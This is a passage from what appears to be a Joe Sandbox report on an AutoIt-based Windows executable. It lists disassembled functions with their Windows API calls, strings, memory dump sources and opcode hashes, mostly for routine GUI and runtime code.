                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00146761
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0014676C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: Combobox
                                                        • API String ID: 3850602802-2096851135
                                                        • Opcode ID: 4337626a485cc4bc911e06a8a8665b780958a61333901fb54c1fda1fcf35c147
                                                        • Instruction ID: 49a16dac8535d75ebae66df65ad5cf5bfd86a9d3bfd696f52212dda62d3f9d07
                                                        • Opcode Fuzzy Hash: 4337626a485cc4bc911e06a8a8665b780958a61333901fb54c1fda1fcf35c147
                                                        • Instruction Fuzzy Hash: 5111B275200208AFEF118F54CC80EFB376AEB4A3ADF114129F918972A1D731DC5187A1
                                                        Function 00146C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000C1D73
                                                          • Part of subcall function 000C1D35: GetStockObject.GDI32(00000011), ref: 000C1D87
                                                          • Part of subcall function 000C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 000C1D91
                                                        • GetWindowRect.USER32(00000000,?), ref: 00146C71
                                                        • GetSysColor.USER32(00000012), ref: 00146C8B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                        • String ID: static
                                                        • API String ID: 1983116058-2160076837
                                                        • Opcode ID: 97d7beac487d1f1d58ba9b1b5f4834728d6d7ab6ec08519888d3a06100ac54d0
                                                        • Instruction ID: a3697bb6b0180fa81707b9157fb8edf1f320db330b5c189ec7f82c858f8c3c94
                                                        • Opcode Fuzzy Hash: 97d7beac487d1f1d58ba9b1b5f4834728d6d7ab6ec08519888d3a06100ac54d0
                                                        • Instruction Fuzzy Hash: 62211476610209AFDF04DFA8CC85EEA7BA8FB09318F014629F995D2260D735E8519B61
                                                        Function 00146920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowTextLengthW.USER32(00000000), ref: 001469A2
                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 001469B1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: LengthMessageSendTextWindow
                                                        • String ID: edit
                                                        • API String ID: 2978978980-2167791130
                                                        • Opcode ID: ad3dbc24c6d95c404a83d82835d970d9d47ac8c21566963294c557b8c09f75d9
                                                        • Instruction ID: 130d832f88061512fa73ffa7fba1a696b8dec297aa38b7630f000227dcf9d90b
                                                        • Opcode Fuzzy Hash: ad3dbc24c6d95c404a83d82835d970d9d47ac8c21566963294c557b8c09f75d9
                                                        • Instruction Fuzzy Hash: 09116A71100208AFEF108E64DC40AEB37A9EB063BCF604728F9A5972F0C7B1DC919761
                                                        Function 001229AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00122A22
                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00122A41
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: InfoItemMenu_memset
                                                        • String ID: 0
                                                        • API String ID: 2223754486-4108050209
                                                        • Opcode ID: d298b23ecfdb5780db05ad80f2a72df414c4f6cab5c9ede2f46580b899047c89
                                                        • Instruction ID: 850214d237dcc92160218e7cc59c101d8c66ed2d72eb170c9c0f6efc1bc9e379
                                                        • Opcode Fuzzy Hash: d298b23ecfdb5780db05ad80f2a72df414c4f6cab5c9ede2f46580b899047c89
                                                        • Instruction Fuzzy Hash: 2D11D032D01134BBCF34DA98FC44BAE77B9EB46304F054021E855EBAA0D770AE2AC791
                                                        Function 001321D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0013222C
                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00132255
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Internet$OpenOption
                                                        • String ID: <local>
                                                        • API String ID: 942729171-4266983199
                                                        • Opcode ID: 026bb534babaf83a2b8cae49f88e2ffc2bc979523eff63bff3d56dc5f040a7da
                                                        • Instruction ID: 1810277f413cd267d58d67f6bcaed3e5e56c4f050e6142e85eb6e78746a4d787
                                                        • Opcode Fuzzy Hash: 026bb534babaf83a2b8cae49f88e2ffc2bc979523eff63bff3d56dc5f040a7da
                                                        • Instruction Fuzzy Hash: 0F11CE70541225FADB29AF518C88EFBFBA8FF16751F10822AFA1586500D3706995D6F0
                                                        Function 00118E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                          • Part of subcall function 0011AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0011AABC
                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00118E73
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 372448540-1403004172
                                                        • Opcode ID: a30dce46c93681b2945d57ba5cc459188af91750cd052d7d28c49d8c4039b85c
                                                        • Instruction ID: 4b81cedef41307cd640442784b01bd4fa71654eebef4d3650aa06681a1e17fdd
                                                        • Opcode Fuzzy Hash: a30dce46c93681b2945d57ba5cc459188af91750cd052d7d28c49d8c4039b85c
                                                        • Instruction Fuzzy Hash: 880124B5602219ABCB18EBA0CC41DFE7778EF06360F144A2DF836672E2EF315848C650
                                                        Function 00128D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: __fread_nolock_memmove
                                                        • String ID: EA06
                                                        • API String ID: 1988441806-3962188686
                                                        • Opcode ID: bd828a3b9b6005d38c394c0928ca9920ea539ae29446b50f05d5376baa5ed037
                                                        • Instruction ID: d6fb125231d088eedf8aab981a1cb3c5eeb4e30dc726e2f4ee58ccf86e40d634
                                                        • Opcode Fuzzy Hash: bd828a3b9b6005d38c394c0928ca9920ea539ae29446b50f05d5376baa5ed037
                                                        • Instruction Fuzzy Hash: B201F9729042587EDB18CAA9CC16EFE7BF8DB11311F00459AF552D2182E974A6188760
                                                        Function 00118CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                          • Part of subcall function 0011AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0011AABC
                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00118D6B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 372448540-1403004172
                                                        • Opcode ID: a13e32d798ecd5bf32c5e2f332d5a8f15e2556b7e86d9d121c80b0bbc7d59124
                                                        • Instruction ID: 88eae44dba12ec34d4b4d94e7f21428338b1435d03e2bfcfb7824a834c6954d3
                                                        • Opcode Fuzzy Hash: a13e32d798ecd5bf32c5e2f332d5a8f15e2556b7e86d9d121c80b0bbc7d59124
                                                        • Instruction Fuzzy Hash: B301D4B5A41209ABCF18EBE0D952EFE77B8DF15340F504029B806672E2DF205E48D672
                                                        Function 00118D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                          • Part of subcall function 0011AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0011AABC
                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00118DEE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 372448540-1403004172
                                                        • Opcode ID: 4963a2774a54f163651cbc3eb7e0102db03e2dc6d4f8f28819c013eb5ff752f5
                                                        • Instruction ID: c22da417d23791a600e02e72a7533074be42688e8a31f90ff86592337643308c
                                                        • Opcode Fuzzy Hash: 4963a2774a54f163651cbc3eb7e0102db03e2dc6d4f8f28819c013eb5ff752f5
                                                        • Instruction Fuzzy Hash: 7E01F2B5A41209A7CF18EBE4D942EFE77A8CF15340F108029B80AA32D2DF215E49D672
                                                        Function 00124F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ClassName_wcscmp
                                                        • String ID: #32770
                                                        • API String ID: 2292705959-463685578
                                                        • Opcode ID: 15bc1455926a8437f92e24c3b1cf8fe51859f4f499518b206ccb7d1b4efe1e81
                                                        • Instruction ID: 3cb207083d2a6710342270764835b1ac328eb759bf4d02ed0b114bf4a304a347
                                                        • Opcode Fuzzy Hash: 15bc1455926a8437f92e24c3b1cf8fe51859f4f499518b206ccb7d1b4efe1e81
                                                        • Instruction Fuzzy Hash: 8CE0D1335006386BD7109B59EC49FA7F7ACDB45B71F000067FD14D3151D6609B9587E0
                                                        Function 000FB2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000FB314: _memset.LIBCMT ref: 000FB321
                                                          • Part of subcall function 000E0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,000FB2F0,?,?,?,000C100A), ref: 000E0945
                                                        • IsDebuggerPresent.KERNEL32(?,?,?,000C100A), ref: 000FB2F4
                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,000C100A), ref: 000FB303
                                                        Strings
                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 000FB2FE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                        • API String ID: 3158253471-631824599
                                                        • Opcode ID: 31e28be42fe058a9d659f21a939a4538aa84c1de5a9f8bfdf7d5bd31d38f7d43
                                                        • Instruction ID: 45cdd4a294682ba3444cc92b80d37690ad9c51d959ed6202ca4382ce1137e574
                                                        • Opcode Fuzzy Hash: 31e28be42fe058a9d659f21a939a4538aa84c1de5a9f8bfdf7d5bd31d38f7d43
                                                        • Instruction Fuzzy Hash: 8BE06D746007008FD7209F28D9047967AE4EF00358F01893DE456C7B51EBB5D585CFA1
                                                        Function 00117C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00117C82
                                                          • Part of subcall function 000E3358: _doexit.LIBCMT ref: 000E3362
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Message_doexit
                                                        • String ID: AutoIt$Error allocating memory.
                                                        • API String ID: 1993061046-4017498283
                                                        • Opcode ID: 94f2e161b99261d143fdd3877b6368849529587aba7795bf256f8e1f4fbc9034
                                                        • Instruction ID: 856dbc1bf94e7e0690f93a1488c171165ad20b19abb2e011747fa479e482689b
                                                        • Opcode Fuzzy Hash: 94f2e161b99261d143fdd3877b6368849529587aba7795bf256f8e1f4fbc9034
                                                        • Instruction Fuzzy Hash: 34D05B323C435836D11532B56C0BFDE79484F05B52F144425FF08696E38AD245C141E5
                                                        Function 00101935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 00101775
                                                          • Part of subcall function 0013BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0010195E,?), ref: 0013BFFE
                                                          • Part of subcall function 0013BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0013C010
                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0010196D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                        • String ID: WIN_XPe
                                                        • API String ID: 582185067-3257408948
                                                        • Opcode ID: 719c4d08bd54301104e16458a60e3c0a39e66c5e68161582669be62fd2c454bf
                                                        • Instruction ID: ec6fb178b904c5644d63afe796f84546f3a19367641dc5f893d670285ebe4b91
                                                        • Opcode Fuzzy Hash: 719c4d08bd54301104e16458a60e3c0a39e66c5e68161582669be62fd2c454bf
                                                        • Instruction Fuzzy Hash: 2DF0ED70804109EFDB15DF91C984FECBBF8BB18305F540099E142A65A0D7B58F85DF61
                                                        Function 00145964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0014596E
                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00145981
                                                          • Part of subcall function 00125244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 001252BC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: FindMessagePostSleepWindow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 529655941-2988720461
                                                        • Opcode ID: 9a0a6087fc35843decf92d0d92c302e333c9381340d6729e8575d67db0675612
                                                        • Instruction ID: b9471b75bef95d317d5b67ae45b9ccd6e4d7797d2be0789eb827b00243c235c6
                                                        • Opcode Fuzzy Hash: 9a0a6087fc35843decf92d0d92c302e333c9381340d6729e8575d67db0675612
                                                        • Instruction Fuzzy Hash: A9D0C935784311B6E664AB70AC4FFD66A25AB11B50F014829B249AA6E0DAE09841C654
                                                        Function 00145998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001459AE
                                                        • PostMessageW.USER32(00000000), ref: 001459B5
                                                          • Part of subcall function 00125244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 001252BC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: FindMessagePostSleepWindow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 529655941-2988720461
                                                        • Opcode ID: 8d199db0c3051daddd639426030b65b9d0a01c4b4484911a6029f727848667f4
                                                        • Instruction ID: 321577c5106562530bd544ad50a663d0aa57a885abf9afc7795e54bf4de65577
                                                        • Opcode Fuzzy Hash: 8d199db0c3051daddd639426030b65b9d0a01c4b4484911a6029f727848667f4
                                                        • Instruction Fuzzy Hash: AED0C9357C0311BAE664AB70AC4FFD66A25AB15B50F014829B249AA6E0DAE0A841C654